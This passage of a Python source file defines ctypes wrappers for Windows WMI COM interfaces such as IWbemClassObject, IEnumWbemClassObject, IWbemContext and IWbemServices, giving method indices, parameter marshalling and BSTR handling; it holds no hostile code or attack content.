paramflags)
_EndEnumeration.errcheck = winapi.RAISE_NON_ZERO_ERR
_EndEnumeration(self.this
)
IWbemClassObject_GetQualifierSet_Idx = 3
IWbemClassObject_Get_Idx = 4
IWbemClassObject_Put_Idx = 5
IWbemClassObject_Delete_Idx = 6
IWbemClassObject_GetNames_Idx = 7
IWbemClassObject_BeginEnumeration_Idx = 8
IWbemClassObject_Next_Idx = 9
IWbemClassObject_EndEnumeration_Idx = 10
IWbemClassObject_GetPropertyQualifierSet_Idx = 11
IWbemClassObject_Clone_Idx = 12
IWbemClassObject_GetObjectText_Idx = 13
IWbemClassObject_SpawnDerivedClass_Idx = 14
IWbemClassObject_SpawnInstance_Idx = 15
IWbemClassObject_CompareTo_Idx = 16
IWbemClassObject_GetPropertyOrigin_Idx = 17
IWbemClassObject_InheritsFrom_Idx = 18
IWbemClassObject_GetMethod_Idx = 19
IWbemClassObject_PutMethod_Idx = 20
IWbemClassObject_DeleteMethod_Idx = 21
IWbemClassObject_BeginMethodEnumeration_Idx = 22
IWbemClassObject_NextMethod_Idx = 23
IWbemClassObject_EndMethodEnumeration_Idx = 24
IWbemClassObject_GetMethodQualifierSet_Idx = 25
IWbemClassObject_GetMethodOrigin_Idx = 26
class IWbemClassObject(com.IUnknown):
def GetQualifierSet(self):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_Out_, 'ppQualSet'),
)
_GetQualifierSet = prototype(IWbemClassObject_GetQualifierSet_Idx,
'GetQualifierSet',
paramflags)
_GetQualifierSet.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _GetQualifierSet(self.this
)
try:
return_obj = IWbemQualifierSet(return_obj)
except WindowsError:
return_obj = None
return return_obj
def Get(self, name, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR,
ctypes.c_long,
ctypes.POINTER(winapi.VARIANT),
ctypes.POINTER(CIMTYPE),
ctypes.POINTER(ctypes.c_long))
paramflags = ((_In_, 'wszName'),
(_In_, 'lFlags'),
(_Out_, 'pVal'),
(_Out_, 'pType'),
(_Out_, 'plFlavor'),
)
_Get = prototype(IWbemClassObject_Get_Idx,
'Get',
paramflags)
_Get.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj, return_obj2, return_obj3 = _Get(self.this,
name,
flags
)
return return_obj, return_obj2, return_obj3
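    # Illustrative sketch (not part of the original source): reading a string
    # property off an instance returned by a query.
    #   val, cim_type, flavor = obj.Get('Name', 0)
    #   name = winapi.V_TO_STR(val)
    #   winapi.VariantClear(val)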
def Put(self, name, flags, val, type_param):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR,
ctypes.c_long,
ctypes.POINTER(winapi.VARIANT),
CIMTYPE)
paramflags = ((_In_, 'wszName'),
(_In_, 'lFlags'),
(_In_, 'pVal'),
(_In_, 'Type'),
)
_Put = prototype(IWbemClassObject_Put_Idx,
'Put',
paramflags)
_Put.errcheck = winapi.RAISE_NON_ZERO_ERR
_Put(self.this,
name,
flags,
ctypes.byref(val) if val else None,
type_param
)
def Delete(self, name):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR)
paramflags = ((_In_, 'wszName'),
)
_Delete = prototype(IWbemClassObject_Delete_Idx,
'Delete',
paramflags)
_Delete.errcheck = winapi.RAISE_NON_ZERO_ERR
_Delete(self.this,
name
)
def GetNames(self, qualifier_name, flags, qualifier_val):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR,
ctypes.c_long,
ctypes.POINTER(winapi.VARIANT),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'wszQualifierName'),
(_In_, 'lFlags'),
(_In_, 'pQualifierVal'),
(_Out_, 'pNames'),
)
_GetNames = prototype(IWbemClassObject_GetNames_Idx,
'GetNames',
paramflags)
_GetNames.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _GetNames(self.this,
qualifier_name,
flags,
ctypes.byref(qualifier_val) if qualifier_val else None
)
return_obj = ctypes.cast(wintypes.LPVOID(return_obj), ctypes.POINTER(winapi.SAFEARRAY))
return return_obj
def BeginEnumeration(self, enum_flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long)
paramflags = ((_In_, 'lEnumFlags'),
)
_BeginEnumeration = prototype(IWbemClassObject_BeginEnumeration_Idx,
'BeginEnumeration',
paramflags)
_BeginEnumeration.errcheck = winapi.RAISE_NON_ZERO_ERR
_BeginEnumeration(self.this,
enum_flags
)
def Next(self, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(BSTR),
ctypes.POINTER(winapi.VARIANT),
ctypes.POINTER(CIMTYPE),
ctypes.POINTER(ctypes.c_long))
paramflags = ((_In_, 'lFlags'),
(_Out_, 'strName'),
(_Out_, 'pVal'),
(_Out_, 'pType'),
(_Out_, 'plFlavor'),
)
_Next = prototype(IWbemClassObject_Next_Idx,
'Next',
paramflags)
_Next.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj, return_obj2, return_obj3, return_obj4 = _Next(self.this,
flags
)
return_obj = winapi.convert_bstr_to_str(return_obj)
return return_obj, return_obj2, return_obj3, return_obj4
def EndEnumeration(self):
prototype = ctypes.WINFUNCTYPE(HRESULT)
paramflags = ()
_EndEnumeration = prototype(IWbemClassObject_EndEnumeration_Idx,
'EndEnumeration',
paramflags)
_EndEnumeration.errcheck = winapi.RAISE_NON_ZERO_ERR
_EndEnumeration(self.this
)
def GetPropertyQualifierSet(self, property_param):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR,
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'wszProperty'),
(_Out_, 'ppQualSet'),
)
_GetPropertyQualifierSet = prototype(IWbemClassObject_GetPropertyQualifierSet_Idx,
'GetPropertyQualifierSet',
paramflags)
_GetPropertyQualifierSet.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _GetPropertyQualifierSet(self.this,
property_param
)
try:
return_obj = IWbemQualifierSet(return_obj)
except WindowsError:
return_obj = None
return return_obj
def Clone(self):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_Out_, 'ppCopy'),
)
_Clone = prototype(IWbemClassObject_Clone_Idx,
'Clone',
paramflags)
_Clone.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _Clone(self.this
)
try:
return_obj = IWbemClassObject(return_obj)
except WindowsError:
return_obj = None
return return_obj
def GetObjectText(self, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(BSTR))
paramflags = ((_In_, 'lFlags'),
(_Out_, 'pstrObjectText'),
)
_GetObjectText = prototype(IWbemClassObject_GetObjectText_Idx,
'GetObjectText',
paramflags)
_GetObjectText.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _GetObjectText(self.this,
flags
)
return_obj = winapi.convert_bstr_to_str(return_obj)
return return_obj
def SpawnDerivedClass(self, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'lFlags'),
(_Out_, 'ppNewClass'),
)
_SpawnDerivedClass = prototype(IWbemClassObject_SpawnDerivedClass_Idx,
'SpawnDerivedClass',
paramflags)
_SpawnDerivedClass.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _SpawnDerivedClass(self.this,
flags
)
try:
return_obj = IWbemClassObject(return_obj)
except WindowsError:
return_obj = None
return return_obj
def SpawnInstance(self, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'lFlags'),
(_Out_, 'ppNewInstance'),
)
_SpawnInstance = prototype(IWbemClassObject_SpawnInstance_Idx,
'SpawnInstance',
paramflags)
_SpawnInstance.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _SpawnInstance(self.this,
flags
)
try:
return_obj = IWbemClassObject(return_obj)
except WindowsError:
return_obj = None
return return_obj
def CompareTo(self, flags, compare_to):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(IWbemClassObject))
paramflags = ((_In_, 'lFlags'),
(_In_, 'pCompareTo'),
)
_CompareTo = prototype(IWbemClassObject_CompareTo_Idx,
'CompareTo',
paramflags)
_CompareTo.errcheck = winapi.RAISE_NON_ZERO_ERR
_CompareTo(self.this,
flags,
compare_to.this if compare_to else None
)
def GetPropertyOrigin(self, name):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR,
ctypes.POINTER(BSTR))
paramflags = ((_In_, 'wszName'),
(_Out_, 'pstrClassName'),
)
_GetPropertyOrigin = prototype(IWbemClassObject_GetPropertyOrigin_Idx,
'GetPropertyOrigin',
paramflags)
_GetPropertyOrigin.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _GetPropertyOrigin(self.this,
name
)
return_obj = winapi.convert_bstr_to_str(return_obj)
return return_obj
def InheritsFrom(self, ancestor):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR)
paramflags = ((_In_, 'strAncestor'),
)
_InheritsFrom = prototype(IWbemClassObject_InheritsFrom_Idx,
'InheritsFrom',
paramflags)
_InheritsFrom.errcheck = winapi.RAISE_NON_ZERO_ERR
_InheritsFrom(self.this,
ancestor
)
def GetMethod(self, name, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR,
ctypes.c_long,
ctypes.POINTER(wintypes.LPVOID),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'wszName'),
(_In_, 'lFlags'),
(_Out_, 'ppInSignature'),
(_Out_, 'ppOutSignature'),
)
_GetMethod = prototype(IWbemClassObject_GetMethod_Idx,
'GetMethod',
paramflags)
_GetMethod.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj, return_obj2 = _GetMethod(self.this,
name,
flags
)
try:
return_obj = IWbemClassObject(return_obj)
except WindowsError:
return_obj = None
try:
return_obj2 = IWbemClassObject(return_obj2)
except WindowsError:
return_obj2 = None
return return_obj, return_obj2
def PutMethod(self, name, flags, in_signature, out_signature):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR,
ctypes.c_long,
ctypes.POINTER(IWbemClassObject),
ctypes.POINTER(IWbemClassObject))
paramflags = ((_In_, 'wszName'),
(_In_, 'lFlags'),
(_In_, 'pInSignature'),
(_In_, 'pOutSignature'),
)
_PutMethod = prototype(IWbemClassObject_PutMethod_Idx,
'PutMethod',
paramflags)
_PutMethod.errcheck = winapi.RAISE_NON_ZERO_ERR
_PutMethod(self.this,
name,
flags,
in_signature.this if in_signature else None,
out_signature.this if out_signature else None
)
def DeleteMethod(self, name):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR)
paramflags = ((_In_, 'wszName'),
)
_DeleteMethod = prototype(IWbemClassObject_DeleteMethod_Idx,
'DeleteMethod',
paramflags)
_DeleteMethod.errcheck = winapi.RAISE_NON_ZERO_ERR
_DeleteMethod(self.this,
name
)
def BeginMethodEnumeration(self, enum_flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long)
paramflags = ((_In_, 'lEnumFlags'),
)
_BeginMethodEnumeration = prototype(IWbemClassObject_BeginMethodEnumeration_Idx,
'BeginMethodEnumeration',
paramflags)
_BeginMethodEnumeration.errcheck = winapi.RAISE_NON_ZERO_ERR
_BeginMethodEnumeration(self.this,
enum_flags
)
def NextMethod(self, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(BSTR),
ctypes.POINTER(wintypes.LPVOID),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'lFlags'),
(_Out_, 'pstrName'),
(_Out_, 'ppInSignature'),
(_Out_, 'ppOutSignature'),
)
_NextMethod = prototype(IWbemClassObject_NextMethod_Idx,
'NextMethod',
paramflags)
_NextMethod.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj, return_obj2, return_obj3 = _NextMethod(self.this,
flags
)
return_obj = winapi.convert_bstr_to_str(return_obj)
try:
return_obj2 = IWbemClassObject(return_obj2)
except WindowsError:
return_obj2 = None
try:
return_obj3 = IWbemClassObject(return_obj3)
except WindowsError:
return_obj3 = None
return return_obj, return_obj2, return_obj3
def EndMethodEnumeration(self):
prototype = ctypes.WINFUNCTYPE(HRESULT)
paramflags = ()
_EndMethodEnumeration = prototype(IWbemClassObject_EndMethodEnumeration_Idx,
'EndMethodEnumeration',
paramflags)
_EndMethodEnumeration.errcheck = winapi.RAISE_NON_ZERO_ERR
_EndMethodEnumeration(self.this
)
def GetMethodQualifierSet(self, method):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR,
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'wszMethod'),
(_Out_, 'ppQualSet'),
)
_GetMethodQualifierSet = prototype(IWbemClassObject_GetMethodQualifierSet_Idx,
'GetMethodQualifierSet',
paramflags)
_GetMethodQualifierSet.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _GetMethodQualifierSet(self.this,
method
)
try:
return_obj = IWbemQualifierSet(return_obj)
except WindowsError:
return_obj = None
return return_obj
def GetMethodOrigin(self, method_name):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR,
ctypes.POINTER(BSTR))
paramflags = ((_In_, 'wszMethodName'),
(_Out_, 'pstrClassName'),
)
_GetMethodOrigin = prototype(IWbemClassObject_GetMethodOrigin_Idx,
'GetMethodOrigin',
paramflags)
_GetMethodOrigin.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _GetMethodOrigin(self.this,
method_name
)
return_obj = winapi.convert_bstr_to_str(return_obj)
return return_obj
IEnumWbemClassObject_Reset_Idx = 3
IEnumWbemClassObject_Next_Idx = 4
IEnumWbemClassObject_NextAsync_Idx = 5
IEnumWbemClassObject_Clone_Idx = 6
IEnumWbemClassObject_Skip_Idx = 7
class IEnumWbemClassObject(com.IUnknown):
def Reset(self):
prototype = ctypes.WINFUNCTYPE(HRESULT)
paramflags = ()
_Reset = prototype(IEnumWbemClassObject_Reset_Idx,
'Reset',
paramflags)
_Reset.errcheck = winapi.RAISE_NON_ZERO_ERR
_Reset(self.this
)
def Next(self, timeout):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
wintypes.ULONG,
ctypes.POINTER(wintypes.LPVOID),
ctypes.POINTER(wintypes.ULONG))
paramflags = ((_In_, 'lTimeout'),
(_In_, 'uCount'),
(_Out_, 'apObjects'),
(_Out_, 'puReturned'),
)
_Next = prototype(IEnumWbemClassObject_Next_Idx,
'Next',
paramflags)
_Next.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj, return_obj2 = _Next(self.this,
timeout,
1
)
try:
return_obj = IWbemClassObject(return_obj)
except WindowsError:
return_obj = None
return return_obj
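    # Note: Next is hardwired to fetch a single object per call (uCount is
    # passed as 1) and the puReturned count from the underlying COM call is
    # discarded.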
def NextAsync(self, count, sink):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.ULONG,
ctypes.POINTER(IWbemObjectSink))
paramflags = ((_In_, 'uCount'),
(_In_, 'pSink'),
)
_NextAsync = prototype(IEnumWbemClassObject_NextAsync_Idx,
'NextAsync',
paramflags)
_NextAsync.errcheck = winapi.RAISE_NON_ZERO_ERR
_NextAsync(self.this,
count,
sink.this if sink else None
)
def Clone(self):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_Out_, 'ppEnum'),
)
_Clone = prototype(IEnumWbemClassObject_Clone_Idx,
'Clone',
paramflags)
_Clone.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _Clone(self.this
)
try:
return_obj = IEnumWbemClassObject(return_obj)
except WindowsError:
return_obj = None
return return_obj
def Skip(self, timeout, count):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
wintypes.ULONG)
paramflags = ((_In_, 'lTimeout'),
(_In_, 'nCount'),
)
_Skip = prototype(IEnumWbemClassObject_Skip_Idx,
'Skip',
paramflags)
_Skip.errcheck = winapi.RAISE_NON_ZERO_ERR
_Skip(self.this,
timeout,
count
)
IWbemCallResult_GetResultObject_Idx = 3
IWbemCallResult_GetResultString_Idx = 4
IWbemCallResult_GetResultServices_Idx = 5
IWbemCallResult_GetCallStatus_Idx = 6
class IWbemCallResult(com.IUnknown):
def GetResultObject(self, timeout):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'lTimeout'),
(_Out_, 'ppResultObject'),
)
_GetResultObject = prototype(IWbemCallResult_GetResultObject_Idx,
'GetResultObject',
paramflags)
_GetResultObject.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _GetResultObject(self.this,
timeout
)
try:
return_obj = IWbemClassObject(return_obj)
except WindowsError:
return_obj = None
return return_obj
def GetResultString(self, timeout):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(BSTR))
paramflags = ((_In_, 'lTimeout'),
(_Out_, 'pstrResultString'),
)
_GetResultString = prototype(IWbemCallResult_GetResultString_Idx,
'GetResultString',
paramflags)
_GetResultString.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _GetResultString(self.this,
timeout
)
return_obj = winapi.convert_bstr_to_str(return_obj)
return return_obj
def GetResultServices(self, timeout):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'lTimeout'),
(_Out_, 'ppServices'),
)
_GetResultServices = prototype(IWbemCallResult_GetResultServices_Idx,
'GetResultServices',
paramflags)
_GetResultServices.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _GetResultServices(self.this,
timeout
)
try:
return_obj = IWbemServices(return_obj)
except WindowsError:
return_obj = None
return return_obj
def GetCallStatus(self, timeout):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(ctypes.c_long))
paramflags = ((_In_, 'lTimeout'),
(_Out_, 'plStatus'),
)
_GetCallStatus = prototype(IWbemCallResult_GetCallStatus_Idx,
'GetCallStatus',
paramflags)
_GetCallStatus.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _GetCallStatus(self.this,
timeout
)
return return_obj
IWbemContext_Clone_Idx = 3
IWbemContext_GetNames_Idx = 4
IWbemContext_BeginEnumeration_Idx = 5
IWbemContext_Next_Idx = 6
IWbemContext_EndEnumeration_Idx = 7
IWbemContext_SetValue_Idx = 8
IWbemContext_GetValue_Idx = 9
IWbemContext_DeleteValue_Idx = 10
IWbemContext_DeleteAll_Idx = 11
class IWbemContext(com.IUnknown):
def Clone(self):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_Out_, 'ppNewCopy'),
)
_Clone = prototype(IWbemContext_Clone_Idx,
'Clone',
paramflags)
_Clone.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _Clone(self.this
)
try:
return_obj = IWbemContext(return_obj)
except WindowsError:
return_obj = None
return return_obj
def GetNames(self, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'lFlags'),
(_Out_, 'pNames'),
)
_GetNames = prototype(IWbemContext_GetNames_Idx,
'GetNames',
paramflags)
_GetNames.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _GetNames(self.this,
flags
)
return_obj = ctypes.cast(wintypes.LPVOID(return_obj), ctypes.POINTER(winapi.SAFEARRAY))
return return_obj
def BeginEnumeration(self, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long)
paramflags = ((_In_, 'lFlags'),
)
_BeginEnumeration = prototype(IWbemContext_BeginEnumeration_Idx,
'BeginEnumeration',
paramflags)
_BeginEnumeration.errcheck = winapi.RAISE_NON_ZERO_ERR
_BeginEnumeration(self.this,
flags
)
def Next(self, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(BSTR),
ctypes.POINTER(winapi.VARIANT))
paramflags = ((_In_, 'lFlags'),
(_Out_, 'pstrName'),
(_Out_, 'pValue'),
)
_Next = prototype(IWbemContext_Next_Idx,
'Next',
paramflags)
_Next.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj, return_obj2 = _Next(self.this,
flags
)
return_obj = winapi.convert_bstr_to_str(return_obj)
return return_obj, return_obj2
def EndEnumeration(self):
prototype = ctypes.WINFUNCTYPE(HRESULT)
paramflags = ()
_EndEnumeration = prototype(IWbemContext_EndEnumeration_Idx,
'EndEnumeration',
paramflags)
_EndEnumeration.errcheck = winapi.RAISE_NON_ZERO_ERR
_EndEnumeration(self.this
)
def SetValue(self, name, flags, value):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR,
ctypes.c_long,
ctypes.POINTER(winapi.VARIANT))
paramflags = ((_In_, 'wszName'),
(_In_, 'lFlags'),
(_In_, 'pValue'),
)
_SetValue = prototype(IWbemContext_SetValue_Idx,
'SetValue',
paramflags)
_SetValue.errcheck = winapi.RAISE_NON_ZERO_ERR
_SetValue(self.this,
name,
flags,
ctypes.byref(value) if value else None
)
def GetValue(self, name, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR,
ctypes.c_long,
ctypes.POINTER(winapi.VARIANT))
paramflags = ((_In_, 'wszName'),
(_In_, 'lFlags'),
(_Out_, 'pValue'),
)
_GetValue = prototype(IWbemContext_GetValue_Idx,
'GetValue',
paramflags)
_GetValue.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _GetValue(self.this,
name,
flags
)
return return_obj
def DeleteValue(self, name, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR,
ctypes.c_long)
paramflags = ((_In_, 'wszName'),
(_In_, 'lFlags'),
)
_DeleteValue = prototype(IWbemContext_DeleteValue_Idx,
'DeleteValue',
paramflags)
_DeleteValue.errcheck = winapi.RAISE_NON_ZERO_ERR
_DeleteValue(self.this,
name,
flags
)
def DeleteAll(self):
prototype = ctypes.WINFUNCTYPE(HRESULT)
paramflags = ()
_DeleteAll = prototype(IWbemContext_DeleteAll_Idx,
'DeleteAll',
paramflags)
_DeleteAll.errcheck = winapi.RAISE_NON_ZERO_ERR
_DeleteAll(self.this
)
IWbemServices_OpenNamespace_Idx = 3
IWbemServices_CancelAsyncCall_Idx = 4
IWbemServices_QueryObjectSink_Idx = 5
IWbemServices_GetObject_Idx = 6
IWbemServices_GetObjectAsync_Idx = 7
IWbemServices_PutClass_Idx = 8
IWbemServices_PutClassAsync_Idx = 9
IWbemServices_DeleteClass_Idx = 10
IWbemServices_DeleteClassAsync_Idx = 11
IWbemServices_CreateClassEnum_Idx = 12
IWbemServices_CreateClassEnumAsync_Idx = 13
IWbemServices_PutInstance_Idx = 14
IWbemServices_PutInstanceAsync_Idx = 15
IWbemServices_DeleteInstance_Idx = 16
IWbemServices_DeleteInstanceAsync_Idx = 17
IWbemServices_CreateInstanceEnum_Idx = 18
IWbemServices_CreateInstanceEnumAsync_Idx = 19
IWbemServices_ExecQuery_Idx = 20
IWbemServices_ExecQueryAsync_Idx = 21
IWbemServices_ExecNotificationQuery_Idx = 22
IWbemServices_ExecNotificationQueryAsync_Idx = 23
IWbemServices_ExecMethod_Idx = 24
IWbemServices_ExecMethodAsync_Idx = 25
class IWbemServices(com.IUnknown):
def OpenNamespaceWithResult(self, namespace, flags, ctx):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(wintypes.LPVOID),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'strNamespace'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_Out_, 'ppWorkingNamespace'),
(_Out_, 'ppResult'),
)
_OpenNamespace = prototype(IWbemServices_OpenNamespace_Idx,
'OpenNamespace',
paramflags)
_OpenNamespace.errcheck = winapi.RAISE_NON_ZERO_ERR
namespace_bstr = winapi.SysAllocString(namespace) if namespace is not None else None
try:
return_obj, return_obj2 = _OpenNamespace(self.this,
namespace_bstr,
flags,
ctx.this if ctx else None
)
finally:
if namespace_bstr is not None:
winapi.SysFreeString(namespace_bstr)
try:
return_obj = IWbemServices(return_obj)
except WindowsError:
return_obj = None
try:
return_obj2 = IWbemCallResult(return_obj2)
except WindowsError:
return_obj2 = None
return return_obj, return_obj2
def OpenNamespace(self, namespace, flags, ctx):
return_obj, return_obj2 = self.OpenNamespaceWithResult(namespace, flags, ctx)
if return_obj2:
return_obj2.Release()
return return_obj
def CancelAsyncCall(self, sink):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.POINTER(IWbemObjectSink))
paramflags = ((_In_, 'pSink'),
)
_CancelAsyncCall = prototype(IWbemServices_CancelAsyncCall_Idx,
'CancelAsyncCall',
paramflags)
_CancelAsyncCall.errcheck = winapi.RAISE_NON_ZERO_ERR
_CancelAsyncCall(self.this,
sink.this if sink else None
)
def QueryObjectSink(self, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'lFlags'),
(_Out_, 'ppResponseHandler'),
)
_QueryObjectSink = prototype(IWbemServices_QueryObjectSink_Idx,
'QueryObjectSink',
paramflags)
_QueryObjectSink.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _QueryObjectSink(self.this,
flags
)
try:
return_obj = IWbemObjectSink(return_obj)
except WindowsError:
return_obj = None
return return_obj
def GetObjectWithResult(self, object_path, flags, ctx):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(wintypes.LPVOID),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'strObjectPath'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_Out_, 'ppObject'),
(_Out_, 'ppCallResult'),
)
_GetObject = prototype(IWbemServices_GetObject_Idx,
'GetObject',
paramflags)
_GetObject.errcheck = winapi.RAISE_NON_ZERO_ERR
object_path_bstr = winapi.SysAllocString(object_path) if object_path is not None else None
try:
return_obj, return_obj2 = _GetObject(self.this,
object_path_bstr,
flags,
ctx.this if ctx else None
)
finally:
if object_path_bstr is not None:
winapi.SysFreeString(object_path_bstr)
try:
return_obj = IWbemClassObject(return_obj)
except WindowsError:
return_obj = None
try:
return_obj2 = IWbemCallResult(return_obj2)
except WindowsError:
return_obj2 = None
return return_obj, return_obj2
def GetObject(self, object_path, flags, ctx):
return_obj, return_obj2 = self.GetObjectWithResult(object_path, flags, ctx)
if return_obj2:
return_obj2.Release()
return return_obj
def GetObjectAsync(self, object_path, flags, ctx, response_handler):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(IWbemObjectSink))
paramflags = ((_In_, 'strObjectPath'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_In_, 'pResponseHandler'),
)
_GetObjectAsync = prototype(IWbemServices_GetObjectAsync_Idx,
'GetObjectAsync',
paramflags)
_GetObjectAsync.errcheck = winapi.RAISE_NON_ZERO_ERR
object_path_bstr = winapi.SysAllocString(object_path) if object_path is not None else None
try:
_GetObjectAsync(self.this,
object_path_bstr,
flags,
ctx.this if ctx else None,
response_handler.this if response_handler else None
)
finally:
if object_path_bstr is not None:
winapi.SysFreeString(object_path_bstr)
def PutClassWithResult(self, object_param, flags, ctx):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.POINTER(IWbemClassObject),
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'pObject'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_Out_, 'ppCallResult'),
)
_PutClass = prototype(IWbemServices_PutClass_Idx,
'PutClass',
paramflags)
_PutClass.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _PutClass(self.this,
object_param.this if object_param else None,
flags,
ctx.this if ctx else None
)
try:
return_obj = IWbemCallResult(return_obj)
except WindowsError:
return_obj = None
return return_obj
def PutClass(self, object_param, flags, ctx):
return_obj = self.PutClassWithResult(object_param, flags, ctx)
if return_obj:
return_obj.Release()
def PutClassAsync(self, object_param, flags, ctx, response_handler):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.POINTER(IWbemClassObject),
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(IWbemObjectSink))
paramflags = ((_In_, 'pObject'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_In_, 'pResponseHandler'),
)
_PutClassAsync = prototype(IWbemServices_PutClassAsync_Idx,
'PutClassAsync',
paramflags)
_PutClassAsync.errcheck = winapi.RAISE_NON_ZERO_ERR
_PutClassAsync(self.this,
object_param.this if object_param else None,
flags,
ctx.this if ctx else None,
response_handler.this if response_handler else None
)
def DeleteClassWithResult(self, class_param, flags, ctx):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'strClass'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
